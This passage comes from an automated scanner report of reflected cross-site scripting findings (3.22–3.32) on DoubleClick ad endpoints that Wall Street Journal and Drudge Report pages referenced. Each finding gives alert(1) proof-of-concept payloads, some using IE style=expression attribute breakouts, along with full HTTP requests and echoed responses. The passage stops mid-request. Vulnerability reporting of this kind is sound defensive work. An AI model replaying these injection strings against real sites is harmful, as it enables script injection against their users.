4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

3.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

3.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

3.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

3.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

3.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
